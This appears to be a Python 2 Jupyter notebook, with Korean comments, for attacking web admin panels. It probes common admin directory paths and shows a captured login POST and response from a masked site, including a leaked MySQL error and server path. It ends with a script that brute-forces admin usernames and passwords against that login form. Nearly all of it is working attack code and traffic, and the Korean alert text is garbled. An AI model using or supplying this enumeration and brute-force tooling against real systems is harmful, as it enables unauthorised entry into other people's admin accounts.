In [1]:
import requests
def check_url(url):
"""
url 에 접속해보고, http status code 를 리턴한다.
"""
try:
response = requests.get(url)
#if (200 == response.status_code):
#print 'headers'
#print '[headers]'
#for header in response.headers:
# print ' {0} = {1}'.format(header, response.headers[header])
#print '[body]'
#print response.text
#else:
#print 'faild. status = {0}'.format(response.status_code)
return response.status_code
except requests.ConnectionError as e:
#print 'exception, {0}'.format(e)
return 404
url_list = \
[
'http://www.google.com',
'http://www.google.com/not_exists.html'
]
for url in url_list:
status_code = check_url(url)
if 200 == status_code:
print 'url = {0}, status_code = {1}, o'.format(url, status_code)
else:
print 'url = {0}, status_code = {1}, x'.format(url, status_code)
In [2]:
_dirs = \
[
'admin',
'administrator',
'manager',
'managment',
]
_file = \
[
'index'
]
_ext = \
[
'html'
]
def create_url_list(base_url):
"""
"""
url_list = []
for dir in _dirs:
url = base_url + '/' + dir + '/' + 'index.hmtl'
url_list.append(url)
return url_list
url_list = create_url_list('http://www.google.com')
for url in url_list:
print url
In [8]:
for url in url_list:
status_code = check_url(url)
if 200 == status_code:
print 'url = {0}, status_code = {1}, o'.format(url, status_code)
else:
print 'url = {0}, status_code = {1}, x'.format(url, status_code)
POST /admin/admin/login_proc.php HTTP/1.1
Host: www.xxx.com
Proxy-Connection: keep-alive
Content-Length: 29
Cache-Control: max-age=0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Origin: http://www.xxx.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.115 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Referer: http://www.xxx.com/admin/main/main.html
Accept-Encoding: gzip, deflate
Accept-Language: ko-KR,ko;q=0.8,en-US;q=0.6,en;q=0.4,ja;q=0.2
Cookie: log_cookie=today; PHPSESSID=b03ee6b66d8f59a1602be7a100412945
id=asdmin&x=26&y=15&pw=asdmin
HTTP/1.1 200 OK
Date: Sat, 28 Feb 2015 07:30:10 GMT
Server: Apache/2.2.23 (Unix) mod_ssl/2.2.23 OpenSSL/1.0.0-fips PHP/5.3.19
X-Powered-By: PHP/5.3.19
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Length: 418
Connection: close
Content-Type: text/html;charset=utf-8
<script type="text/javascript">
alert("ë¡ê·¸ì¸ ì ë³´ê° íë ¸ìµëë¤.ìì¤í
ê´ë¦¬ììê² ë¬¸ì íì¸ì!");
history.go(-1);</script>
<br />
<b>Warning</b>: mysql_fetch_object(): supplied argument is not a valid MySQL result resource in <b>/home/seon/public_html/admin/admin/login_proc.php</b> on line <b>27</b><br />
<script>
window.location.href="admin_pw.php?menuBid=1&menuSid=0";
</script>
In [15]:
import requests
def login(id, pw):
"""
id, pw 로 로그인을 시도해 보고, 성공하면 True 를 리턴하고,
로그인 실패시 False 를 리턴한다.
"""
url = 'http://www.xxxx.com/admin/admin/login_proc.php'
payload = 'id={0}&x=26&y=15&pw={1}'.format(id, pw)
header = {'content-type': 'application/x-www-form-urlencoded'}
response = requests.post(url, data = payload, headers = header)
if (200 == response.status_code):
print 'headers'
print '[headers]'
for header in response.headers:
print ' {0} = {1}'.format(header, response.headers[header])
#print '[body]'
#print response.text
else:
print 'faild. status = {0}'.format(response.status_code)
if response.status_code is 200 and response.text.find('history.go(-1)') is -1:
# ok, we got!
print url
print '[succeeded] id = {0}, pw = {1}'.format(id, pw)
return True
else:
print '[fail ] id = {0}, pw = {1}'.format(id, pw)
return False
id_list = ['adminstrator', 'admin']
pw_list = ['pw123', 'abdddd123']
found = False
for id in id_list:
if True == found:
break;
for pw in pw_list:
if True == login(id, pw):
found = True
break;
print 'brute force finished.'